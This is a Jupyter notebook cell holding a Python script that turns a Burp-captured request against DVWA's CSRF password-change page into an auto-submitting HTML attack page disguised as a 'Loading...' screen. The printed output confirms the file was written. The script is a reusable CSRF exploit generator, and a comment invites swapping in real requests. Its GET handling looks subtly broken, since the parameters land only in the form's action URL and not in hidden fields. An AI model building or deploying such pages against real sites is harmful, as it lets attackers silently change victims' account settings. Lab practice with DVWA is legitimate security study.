In [3]:
import urllib.parse

# === 样例 Burp 抓包（你可以替换为真实请求） ===
raw_request = """GET /DVWA/vulnerabilities/csrf/?password_new=test&password_conf=test&Change=Change HTTP/1.1 
Host: 192.168.88.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.88.129/DVWA/vulnerabilities/csrf/
Cookie: PHPSESSID=gng5eb7uqffemgr09be7urr0v5; security=low
Upgrade-Insecure-Requests: 1
Priority: u=0, i
"""

# === 分析请求 ===
def parse_raw_http(raw):
    lines = raw.strip().splitlines()
    method, path, _ = lines[0].split()
    headers = {}
    body = ""
    in_body = False

    for line in lines[1:]:
        if line == "":
            in_body = True
            continue
        if in_body:
            body += line
        else:
            key, value = line.split(":", 1)
            headers[key.strip()] = value.strip()

    host = headers.get("Host", "example.com")
    action = f"http://{host}{path}"
    params = urllib.parse.parse_qs(body)

    return action, method, params

# === 生成 CSRF HTML 文件 ===
def generate_csrf_html(action, method, params):
    html = f"""<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="UTF-8">
  <title>Loading...</title>
</head>
<body onload="document.forms[0].submit()">
  <h3>正在加载，请稍候...</h3>
  <form action="{action}" method="{method}">
"""

    for key, values in params.items():
        for val in values:
            html += f'    <input type="hidden" name="{key}" value="{val}">\n'

    html += """  </form>
</body>
</html>
"""
    return html

# === 主程序 ===
if __name__ == "__main__":
    action, method, params = parse_raw_http(raw_request)
    html = generate_csrf_html(action, method, params)
    
    with open("csrf_menu_attack.html", "w", encoding="utf-8") as f:
        f.write(html)
    
    print("✅ 攻击页面已生成：csrf_menu_attack.html")
    print(f"📌 表单自动提交至：{action}")


✅ 攻击页面已生成：csrf_menu_attack.html
📌 表单自动提交至：http://192.168.88.129/DVWA/vulnerabilities/csrf/?password_new=test&password_conf=test&Change=Change
